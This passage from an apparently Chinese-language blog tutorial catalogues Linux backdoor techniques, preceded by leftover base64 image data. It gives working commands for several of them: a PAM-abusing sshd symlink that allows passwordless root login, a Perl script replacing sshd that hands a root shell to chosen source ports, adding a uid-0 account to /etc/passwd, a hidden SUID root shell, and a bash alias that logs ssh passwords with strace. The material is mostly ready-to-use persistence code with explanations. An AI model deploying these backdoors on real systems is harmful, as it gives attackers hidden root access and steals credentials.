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" alt="" />

通过注入命令实现端口转发，执行完这条命令后，我们就可以使用这台机器的9090端口做SOCKS5代理，访问下一跳的网段。同时不会增加新的TCP会话，而是复用了老的ssh会话，所以可以理解为是一个ssh隧道。

前面说过，如果ControlPersist为yes，则不会自动删除sockets文件，我们可以手工rm删除/tmp/root@112.124.20.20\:22，也可以优雅的使用

ssh -O exit -S /tmp/root@112.124.20.20\:22 %h

aaarticlea/png;base64,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" alt="" />

8. 利用ssh pam认证机制实现ssh root免密后门

0x1：实现过程

在被控制的服务器上执行如下指令，创建一个名为su的指向sshd的软链接。

ln -sf /usr/sbin/sshd /tmp/su;nohup /tmp/su -oPort= &

然后打开一个新的登陆会话，账户root，密码任意，可以直接登录成功。

注意，被控制服务器（部署ssh后门的服务器）需要配置“允许root登录”以及“开启pam认证”。

0x2：实现原理

当进程名为su的进程启动时，由于其触发了auth登录验证（类似于在命令行执行su xxx指令）。系统会读取“/etc/pam.d/su”内的配置信息。

以ubuntu为例，

root@iZuf651jh0tfb2bx32x9lpZ:~# cat /etc/pam.d/su

#

# The PAM configuration file for the Shadow `su' service

#

# This allows root to su without passwords (normal operation)

auth       sufficient pam_rootok.so

# Uncomment this to force users to be a member of group root

# before they can use `su'. You can also add "group=foo"

# to the end of this line if you want to use a group other

# than the default "root" (but this may have side effect of

# denying "root" user, unless she's a member of "foo" or explicitly

# permitted earlier by e.g. "sufficient pam_rootok.so").

# (Replaces the `SU_WHEEL_ONLY' option from login.defs)

# auth       required   pam_wheel.so

# Uncomment this if you want wheel members to be able to

# su without a password.

# auth       sufficient pam_wheel.so trust

# Uncomment this if you want members of a specific group to not

# be allowed to use su at all.

# auth       required   pam_wheel.so deny group=nosu

# Uncomment and edit /etc/security/time.conf if you need to set

# time restrainst on su usage.

# (Replaces the `PORTTIME_CHECKS_ENAB' option from login.defs

# as well as /etc/porttime)

# account    requisite  pam_time.so

# This module parses environment configuration file(s)

# and also allows you to use an extended config

# file /etc/security/pam_env.conf.

#

# parsing /etc/environment needs "readenv=1"

session       required   pam_env.so readenv=

# locale variables are also kept into /etc/default/locale in etch

# reading this file *in addition to /etc/environment* does not hurt

session       required   pam_env.so readenv= envfile=/etc/default/locale

# Defines the MAIL environment variable

# However, userdel also needs MAIL_DIR and MAIL_FILE variables

# in /etc/login.defs to make sure that removing a user

# also removes the user's mail spool file.

# See comments in /etc/login.defs

#

# "nopen" stands to avoid reporting new mail when su'ing to another user

session    optional   pam_mail.so nopen

# Sets up user limits according to /etc/security/limits.conf

# (Replaces the use of /etc/limits in old login)

session    required   pam_limits.so

# The standard Unix authentication modules, used with

# NIS (man nsswitch) as well as normal /etc/passwd and

# /etc/shadow entries.

@include common-auth

@include common-account

@include common-session

重点是这行：

auth       sufficient pam_rootok.so

sufficient 表示只要这行满足，直接返回登录成功。

Linux man 手册上关于 pam_rootok.so 的介绍

看一下pam_rootok.so的源码，

关键点在于红框部分，模块会调用getuid()，如果get的uid为0，它会检查selinux的root是否为0或是否在启用selinux下为0，是0，则返回认证成功，否则认证失败。

在正常情况下，如果是root账户执行su指令，会直接忽略密码验证，这是系统设计这个机制的本意。

但是这里攻击者将sshd软连接为su进程，从而借助sudo的root免密验证机制，实现了免密ssh后门的目的。

Relevant Link:

https://www.freebuf.com/articles/system/138753.html

9. 利用perl实现sshd后门

0x1：后门代码实现

将原本的”/usr/sbin/sshd“备份，用下列这个perl脚本代替之，

#!/usr/bin/perl

exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);

exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

• exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/)：如果当前文件句柄STDIN是一个socket，且socket的远程连接源端口是31334（Big 网络字节序中的16进制字符串为\x00\x00zf， 正好匹配上perl正则 ..zf），则执行/bin/sh，并结束当前程序运行（不会执行第二步），相当于反弹一个root shell （因为sshd 是以root权限运行的）给远程socket
• exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV：启动sshd (/usr/bin/sshd是真正的sshd)服务 ，凡是传递给/usr/sbin/sshd (后门)的参数都传递给真正的sshd （这一行保证了普通用户也可以正常使用ssh 服务，登录并不会有什么异常现象）

0x2：后门部署过程

# 将真正的sshd 移至/usr/bin/sshd，

mv /usr/sbin/sshd /usr/bin/sshd

# 将后门sshd (perl脚本移动至/usr/sbin/sshd),并授予执行权限

chmod +x /usr/sbin/sshd 

# 重启 ssh 服务

/etc/init.d/ssh restart 

# 在控制端执行以下操作，即发起ssh后门连接：

socat STDIO TCP4:10.1.100.3:,sourceport=

这行命令的意思是说，将输入输出重定向至于socket 10.1.100.3:（部署了sshd后门的机器ip）。这样后门perl脚本中STDIN就是socket了， 且这个socket的源端口为31334

# 这行命令等价于

socat -TCP4:10.1.100.3:,sourceport=

这样就可以无需认证 （因为还未到sshd认证阶段就反弹root shell了），实现获取控制端系统shell的目的，也即一个ssh后门。

为了增强隐秘性， 我们可以将copy 一份/bin/sh， 重命名为/bin/sshd，修改后门源码为：

#!/usr/bin/perl

exec"/bin/sshd"if(getpeername(STDIN)=~/^..zf/);

exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

控制端再次连接后查看网络连接情况，会看到有一个叫sshd的进程，打开了一个socket句柄。

Relevant Link:

https://www.freebuf.com/articles/system/140880.html

10. 系统后门账号添加

0x1：Windows $隐身账号

0x2：增加Linux root增加超级用户

echo "mx7krshell:x:0:0::/:/bin/sh" >> /etc/passwd

如果系统不允许uid=0的用户远程登录，可以增加一个普通用户账号

echo "mx7krshell::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

11. X置位后门

0x1：放置SUID Shell

普通用户在本机运行/dev/.rootshell，即可获得一个root权限的shell。

cp /bin/bash /dev/.rootshell

chmod u+s /dev/.rootshell

12. Linux环境变量后门

0x1：alias 后门

当前用户目录下.bashrc

alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'